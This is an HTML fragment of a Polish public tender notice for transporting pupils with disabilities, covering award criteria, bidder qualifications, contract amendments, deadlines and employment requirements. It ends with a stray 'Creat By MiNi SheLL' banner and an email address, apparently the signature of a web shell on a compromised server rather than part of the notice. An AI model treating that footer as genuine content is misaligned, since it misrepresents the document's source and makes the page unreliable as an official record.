zakresie specjalistycznego transportu drogowego osób</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-11-02 do 2023-06-23</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokona oceny ofert przyznając w ramach poszczególnych kryteriów oceny ofert.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">czas podstawienia pojazdu zastępczego w razie awarii</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy nie podlegają wykluczeniu na zasadach określonych w Rozdziale IX SWZ, oraz spełniają określone przez Zamawiającego warunki udziału w postępowaniu.<br/>2.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają niżej określone przez Zamawiającego warunki udziału w postępowaniu: <br/>1) W zakresie kompetencji lub uprawnień do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów: <br/>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny. Zamawiający uzna, że warunek jest spełniony, jeżeli Wykonawca złoży oświadczenie o spełnieniu warunków udziału w postępowaniu.<br/>2) W zakresie sytuacji ekonomicznej lub finansowej: <br/>Zamawiający wymaga, aby Wykonawca posiadał ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną minimum 100.000 zł.<br/>3) W zakresie zdolności technicznej lub zawodowej <br/>a) Warunek będzie potwierdzony, jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponował w czasie wykonywania zamówienia co najmniej jednym środkiem transportu przeznaczonym i dostosowanym do dowozu uczniów z niepełnosprawnościami, posiadającym pasy bezpieczeństwa.<br/>b) Warunek dotyczący zdolności zawodowej zostanie spełniony:<br/>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.<br/>- Wykonawca dysponuje odpowiednim potencjałem osobowym tj.:<br/>Co najmniej 1 osobą posiadającą ważne uprawnienia i badania lekarskie niezbędne do kierowania środkami transportu przeznaczonymi do przewozu osób, oraz 1 osobą/ opiekunem do sprawowania opieki nad dziećmi w czasie ich przewozu.<br/>4) Posiadania wiedzy i doświadczenia <br/>Zamawiający wymaga by Wykonawca przedłożył aktualną licencję na wykonywanie krajowego transportu drogowego osób, o której mowa w art. 7 ustawy z dnia 6 września 2001 r. o transporcie drogowym (t.j Dz. U. z 2022 r. poz. 180 ze zm).<br/>UWAGA<br/>W przypadku wykonawców wspólnie ubiegających się o zamówienie, warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej jest spełniony, jeżeli co najmniej jeden z wykonawców wspólnie ubiegających się o udzielenie zamówienia posiada uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej i zrealizuje roboty budowlane, dostawy lub usługi, do których realizacji te uprawnienia są wymagane. (art. 117 pzp)<br/>3. Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu, w stosownych sytuacjach oraz w odniesieniu do konkretnego zamówienia, lub jego części, polegać na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej innych podmiotów, niezależnie od charakteru prawnego łączących go z nim stosunków prawnych. Wykonawca, który polega na zdolnościach lub sytuacji innych podmiotów, musi udowodnić Zamawiającemu, że realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia.<br/>4. Wykonawca, który polega na zdolnościach technicznych lub zawodowych albo sytuacji finansowej lub ekonomicznej innych podmiotów, odpowiada solidarnie z podmiotem, który zobowiązał się do udostępnienia zasobów, za szkodę poniesioną przez Zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba że za nieudostępnienie zasobów nie ponosi winy.<br/>5. Zamawiający może, na każdym etapie postępowania, uznać że Wykonawca nie posiada wymaganych zdolności, jeżeli zaangażowanie zasobów technicznych lub zawodowych Wykonawcy w inne przedsięwzięcia gospodarcze Wykonawcy może mieć negatywny wpływ na realizację zamówienia.<br/>6. Zamawiający ocenia, czy udostępnione Wykonawcy przez inne podmioty zdolności techniczne lub zawodowe lub ich sytuacja finansowa lub ekonomiczna, pozwalają na wykazanie przez Wykonawcę spełniania warunków udziału w postępowaniu oraz bada, czy nie zachodzą wobec tego podmiotu podstawy wykluczenia z postępowania.<br/>7. Jeżeli zdolności techniczne lub zawodowe lub sytuacja ekonomiczna lub finansowa, podmiotu udostępniającego potencjał, nie potwierdzają spełniania przez Wykonawcę warunków udziału w postępowaniu, lub zachodzą wobec tych podmiotów podstawy wykluczenia, Zamawiający żąda, aby Wykonawca w terminie określonym przez Zamawiającego:<br/>a) zastąpił ten podmiot innym podmiotem lub podmiotami lub<br/>b) zobowiązał się do osobistego wykonania odpowiedniej części zamówienia, jeżeli wykaże zdolności techniczne lub zawodowe lub sytuacje finansową lub ekonomiczną. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Do oferty Wykonawca zobowiązany jest dołączyć aktualne na dzień składania ofert oświadczenie o spełnieniu warunków udziału w postępowaniu oraz o braku podstaw wykluczenia z postępowania, którego wzór stanowi Załącznik nr 3 i 4 do SWZ. Oświadczenia te składa się pod rygorem nieważności w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.<br/>2. Informacje zawarte w oświadczeniach, o których mowa w pkt. 1 stanowią wstępne potwierdzenie, że Wykonawca nie podlega wykluczeniu oraz spełnia warunki udziału <br/>w postępowaniu.<br/>3. Zamawiający wezwie Wykonawcę, którego oferta zostanie najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, aktualnych na dzień złożenia podmiotowych środków dowodowych.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający będzie wymagał od Wykonawcy złożenia następujących podmiotowych środków dowodowych:<br/>1) Oświadczenia Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy,<br/>o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16.02.2007 r. o ochronie konkurencji i konsumentów (Dz.U. z 2021 r. poz. 275),<br/>z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek <br/>o dopuszczenie do udziału w postepowaniu, albo oświadczenie o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału <br/>w postepowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej. Wzór oświadczenia stanowi Załącznik nr 5 do SWZ.<br/>2) W celu potwierdzania spełniania przez Wykonawcę warunków udziału w postępowaniu Wykonawca składa:<br/>1) dokumenty potwierdzające posiadanie kompetencji i uprawnień t.j. ważną licencję lub obowiązującym zezwoleniem na wykonywanie krajowego transportu drogowego osób zgodnie z art. 7 ustawy z dnia 6 września 2001 r. o transporcie drogowym (t.j. Dz. U. z 2022 r., poz. 180 ze zm.).<br/>2) Wykazu narzędzi, wyposażenia zakładu lub urządzeń technicznych (wg wzoru Załącznik nr 10 do SWZ) dostępnych wykonawcy w celu wykonania zamówienia wraz z informacją o podstawie dysponowania tymi zasobami – w celu potwierdzenia spełniania warunku udziału w postępowaniu dotyczącego potencjału technicznego Wykonawcy.<br/>3)Dokument potwierdzający że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną minimum 100.000,00 zł<br/>4)Pisemne zobowiązanie innych podmiotów do oddania do dyspozycji Wykonawcy niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia (wg wzoru Załącznik nr 9 do SWZ) (do oferty jeśli dotyczy).<br/>5)Po wyborze oferty, najpóźniej do dnia 28 października 2022 r. należy przedłożyć wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami (wg wzoru Załącznik nr 6 do SWZ).<br/>5. Jeżeli jest to niezbędne do zapewnienia odpowiedniego przebiegu postępowania <br/>o udzielenie zamówienia, zamawiający może na każdym etapie postępowania wezwać wykonawców do złożenia wszystkich lub niektórych oświadczeń lub dokumentów potwierdzających, że nie podlegają wykluczeniu oraz spełniają warunki udziału w postępowaniu, a jeżeli zachodzą uzasadnione podstawy do uznania, że złożone uprzednio oświadczenia lub dokumenty nie są już aktualne, do złożenia aktualnych oświadczeń lub dokumentów.<br/>6. Wykonawca nie jest zobowiązany do złożenia podmiotowych środków dowodowych, które zamawiający posiada, jeżeli wykonawca wskaże te środki oraz potwierdzi ich prawidłowość i aktualność.<br/>7.	W zakresie nieuregulowanym ustawą P.z.p. lub niniejszą SWZ do oświadczeń i dokumentów składanych przez Wykonawcę w postępowaniu zastosowanie mają w szczególności przepisy rozporządzenia Ministra Rozwoju Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy oraz rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>2.	W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia o których mowa w rozdziale X pkt. 1 SWZ składa każdy z wykonawców. Oświadczenia te potwierdzają, brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z wykonawców wykazuje spełnienie warunków udziału w postępowaniu.<br/>3.	Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie.<br/>4.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenia, z których wynika, które usługi wykonują poszczególni wykonawcy. Wzór oświadczenia stanowi Załącznik nr 8 do SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 2.	Zakres świadczenia Wykonawcy wynikający z umowy jest tożsamy z jego zobowiązaniem zawartym w ofercie.<br/>3.	Zamawiający przewiduje możliwości zmiany zawartej umowy w stosunku do treści wybranej oferty w zakresie uregulowanym w art. 454 – 455 pzp oraz wskazanym w projektowanych postanowieniach umowy, które zostaną wprowadzone do umowy w sprawie zamówienia publicznego stanowiących Załącznik nr 2 do SWZ.<br/>4.	Zmiana umowy wymaga dla swojej ważności, pod rygorem nieważności, zachowania formy pisemnej.<br/>5.	Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, chyba że zmiana będzie dotyczyła następujących zdarzeń:<br/>1)	Wystąpienia zmian powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu umowy.<br/>2)	Wyniknięcia rozbieżności lub niejasności w rozumieniu pojęć użytych w umowie, których nie można usunąć w inny sposób, a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie umowy w celu jednoznacznej interpretacji jej zapisów przez strony.<br/>3)	Wystąpienia konieczności zmian osób Wykonawcy, w przypadku gdy zamawiający uzna, że osoby te nie wykonują należycie swoich obowiązków. Wykonawca obowiązany jest dokonać zmiany tych osób, na inne spełniające na dzień składania ofert warunki określone w specyfikacji, w terminie nie dłuższym niż 14 dni od daty złożenia wniosku zamawiającego,<br/>4)	Zmiana terminu realizacji przedmiotu umowy z przyczyn niezależnych od Wykonawcy a także z np. wystąpienia zwłoki w wydaniu przez organy administracji lub inne podmioty wymaganych decyzji, zezwoleń,<br/>5)	Wystąpienia konieczności wprowadzenia zmian spowodowanych następującymi okolicznościami:<br/>a)	siła wyższa uniemożliwiająca wykonanie przedmiotu umowy zgodnie ze szczegółowym opisem,<br/>b)	zmiana danych związanych z obsługą administracyjno-organizacyjną umowy (np. zmiana numeru rachunku bankowego),<br/>c)	zmiany danych teleadresowych,<br/>d)	zmiana obowiązującej stawki VAT,<br/>6.	W przypadku wystąpienia któregokolwiek ze zdarzeń wymienionych w pkt.5 termin realizacji przedmiotu umowy może ulec odpowiedniemu przedłużeniu, o czas niezbędny do zakończenia wykonywania jej przedmiotu w sposób należyty, nie dłużej jednak niż o okres trwania tych okoliczności.<br/>7.	Zamawiający dopuszcza możliwość dokonania zmian w zakresie powierzenia części lub całości wykonania przedmiotu zamówienia podwykonawcom, poprzez:<br/>1)	w przypadku nie przewidzenia podwykonawców w momencie składania oferty, wprowadzenie ich podczas realizacji zamówienia,<br/>2)	rozszerzenie kręgu podwykonawców,<br/>3)	zmianę lub wykreślenie podwykonawcy,<br/>4)	zmianę zakresu prac powierzonych podwykonawcy,<br/>8.	Warunki zmian:<br/>1)	inicjowanie zmian – na wniosek wykonawcy lub Zamawiającego,<br/>2)	uzasadnienie zmian – prawidłowa realizacja przedmiotu umowy, <br/>3)	forma zmian – aneks do umowy w formie pisemnej pod rygorem nieważności. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-10-05 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">7.	Wykonawca składa ofertę za pośrednictwem „Formularza do złożenia, zmiany, wycofania oferty lub wniosku” dostępnego na miniPortalu i udostępnionego również na ePUAP.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-10-05 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-11-03</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1.	Zamawiający nie przewiduje zwrotu kosztów postępowania.<br/>2.	Zamawiający nie wymaga wizji lokalnej.<br/>3.	Dla przedmiotowego postępowania nie ma zastosowania żadna z sytuacji określonych w art. 65 ust 1, art. 66 i art. 69 pzp. W związku z powyższym nie zachodzi konieczność komunikowania się z Wykonawcą w sposób inny niż przewidziany w niniejszej SWZ.<br/>4.	Stosownie do dyspozycji art. 95 ustawy pzp, Zamawiający wymaga zatrudnienia przy realizacji zamówienia przez Wykonawcę lub podwykonawcę na podstawie stosunku pracy, osób wykonujących czynności w zakresie realizacji zamówienia, które wskazano SWZ oraz załącznikach do SWZ, w sposób określony w art. 22 § 1 ustawy z dnia 26 czerwca 1974 r. Kodeks pracy ( Dz. U. z 2020 r. poz 1320).<br/>1)	Zamawiający wymaga zatrudnienia na podstawie umowy o pracę przez Wykonawcę lub podwykonawcę osób wykonujących wskazane przez Zamawiającego czynności w zakresie realizacji zamówienia:<br/>a)	kierowanie pojazdami na podstawie umowy o pracę w rozumieniu przepisów ustawy z dnia 26 czerwca 1974 r. – Kodeks Pracy (t . j. Dz. U. z 2020 r. poz. 1320 z późn. zm.), zgodnie z oświadczeniem złożonym w formularzu ofertowym.<br/>b)	sprawowanie opieki nad dziećmi w czasie ich przewozu na podstawie umowy o pracę w rozumieniu przepisów ustawy z dnia 26 czerwca 1974 r. – Kodeks Pracy (t. j. Dz. U. z 2020 r. poz. 1320 z późn. zm.), zgodnie z oświadczeniem złożonym w formularzu ofertowym.<br/>	Pozostałe wymogi wynikające z art. 95 ustawy zostały określone w istotnych postanowieniach przyszłej umowy, które stanowią załącznik do SWZ. Ustalenie wymiaru czasu pracy oraz liczby osób Zamawiający pozostawia w gestii Wykonawcy.<br/>2) Sposób weryfikacji zatrudnienia osób:<br/>a) Wykonawca w terminie 14 dni od podpisania umowy przekaże Zamawiającemu, ujęte w formie wykazu informacje o osobach zatrudnionych, wykonujących czynności wskazane w pkt 1). Wykaz powinien zawierać imię i nazwisko pracownika, wymiar zatrudnienia oraz informację o wykonywanych czynnościach/stanowisko pracy. Wraz z wykazem Wykonawca przekazuje oświadczenie, że wymienione osoby zatrudnione są na podstawie umowy o pracę.<br/>3) Uprawnienia Zamawiającego w zakresie kontroli spełnienia przez Wykonawcę wymagań związanych z zatrudnieniem osób:<br/>	Zamawiający zastrzega sobie prawo przeprowadzenia kontroli na miejscu wykonywania zamówienia, przez cały okres realizacji wykonywanych przez Wykonawcę czynności, w celu weryfikacji, czy osoby wykonujące czynności przy realizacji zamówienia są osobami wskazanymi przez Wykonawcę. W celu weryfikacji zatrudnienia przez Wykonawcę lub Podwykonawcę na podstawie umowy o pracę osób wskazanych w pkt. 1) Zamawiający może żądać przedłożenia :<br/>a) oświadczenia zatrudnionego pracownika<br/>b) oświadczenia Wykonawcy lub Podwykonawcy o zatrudnieniu pracownika na podstawie umowy o pracę,<br/>c) poświadczonej za zgodność z oryginałem kopii umowy o pracę zatrudnionego pracownika,<br/>d) innych dokumentów zawierających informacje niezbędne do weryfikacji zatrudnienia na podstawie umowy o pracę w tym zawierających dane osobowe- w szczególności imię i nazwisko zatrudnionego pracownika, datę zawarcia umowy o pracę, rodzaj umowy o pracę i zakres obowiązków pracownika. <br/>4) Sankcje z tytułu niespełnienia wymagań, o których mowa w art. 95 ust 1 pzp:<br/>a) Zamawiającemu przysługiwać będzie prawo naliczenia Wykonawcy kar umownych w wysokości 200 zł brutto;<br/>b) Niezłożenie przez Wykonawcę w wyznaczonych przez Zamawiającego terminach żądanych dowodów, w celu potwierdzenia spełnienia przez wykonawcę lub podwykonawcę wymogu zatrudnienia na podstawie umowy o pracę traktowane będzie jako niespełnienie przez Wykonawcę lub podwykonawcę wymogu zatrudnienia na podstawie umowy o pracę osób wykonujących przy realizacji zamówienia wskazane w pkt 1) czynności.

Creat By MiNi SheLL
Email: jattceo@gmail.com